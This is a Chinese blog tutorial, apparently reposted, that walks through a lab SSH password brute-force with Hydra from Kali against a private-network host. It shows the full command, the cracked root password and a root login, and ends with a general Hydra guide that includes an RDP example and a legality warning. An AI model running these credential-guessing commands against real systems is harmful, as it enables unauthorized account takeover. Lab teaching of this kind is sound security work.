Kali系列之hydra ssh密码爆破

环境

kali 192.168.137.131

靶机 192.168.137.133

语句

hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133

状态

root@kali:/home/chenglee# hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-12 10:21:01
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 213561 login tries (l:1/p:0), ~213561 tries per task
[DATA] attacking ssh://192.168.137.133:22/
[STATUS] 96.00 tries/min, 96 tries in 00:00h, 0 to do in 01:00h, 213465 active
[22][ssh] host: 192.168.137.133   login: root   password: lizhenghua
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-12 10:23:47
root@kali:/home/chenglee# ss
ss           ssh2john     ssh-argv0    ssh-keygen   sshow        ssldump      sslscan      sslstrip     
sselp        ssh-add      ssh-copy-id  ssh-keyscan  ssid         sslh         sslsniff     sslyze       
ssh          ssh-agent    sshd         sshmitm      sslcaudit    sslh-select  sslsplit     ss_spike     
root@kali:/home/chenglee# ssh root@192.168.137.133
root@192.168.137.133's password: 
Last login: Thu Apr 12 17:15:19 2018 from 192.168.137.1
[root@localhost ~]# ipaddr
-bash: ipaddr: command not found
[root@localhost ~]# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:85:c0:fa brd ff:ff:ff:ff:ff:ff
    inet 192.168.137.133/24 brd 192.168.137.255 scope global eth0
    inet6 fe80::20c:29ff:fe85:c0fa/64 scope link 
       valid_lft forever preferred_lft forever

 

转载于:https://www.cnblogs.com/chenglee/p/8805871.html

使用Kali Linux中的Hydra工具进行密码爆破攻击是一项安全测试活动,用于检查系统的安全性。请注意,这样的行为应该仅限于授权的测试环境或在你拥有明确授权的情况下进行,未经授权对任何系统进行攻击是违法的。 下面是一个基本的指导,介绍如何使用Hydra工具来尝试破解Windows 7操作系统的用户名和密码: 1. 准备工作:首先,确保你已经安装了Kali Linux,并且已经安装了Hydra工具。如果没有安装,可以通过Kali的包管理器apt进行安装。 2. 收集信息:了解目标系统的IP地址、使用的协议(如SSH, FTP, HTTP等)以及可能的用户名和密码信息。 3. 运行Hydra:使用以下格式的命令来尝试爆破密码: ```bash hydra -l username -P passwords.txt -s port_number ip_address protocol ``` - `-l username`:指定要尝试的用户名。 - `-P passwords.txt`:指定包含可能密码的文件。 - `-s port_number`:指定服务运行的端口号(如远程桌面默认是3389)。 - `ip_address`:目标系统的IP地址。 - `protocol`:指定服务的协议,例如:`rdp`(远程桌面协议)、`ssh`、`ftp`等。 例如,如果你尝试爆破远程桌面的密码,命令可能如下: ```bash hydra -l administrator -P passwords.txt -s 3389 192.168.1.1 rdp ``` 这里 `-l administrator` 表示尝试破解的用户名是 `administrator`,`-P passwords.txt` 是一个包含密码的文本文件,`-s 3389` 指定远程桌面服务的端口,`192.168.1.1` 是目标系统的IP地址。 4. 分析输出:Hydra执行完毕后会显示结果,如果成功,它会告诉你找到的密码是什么。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值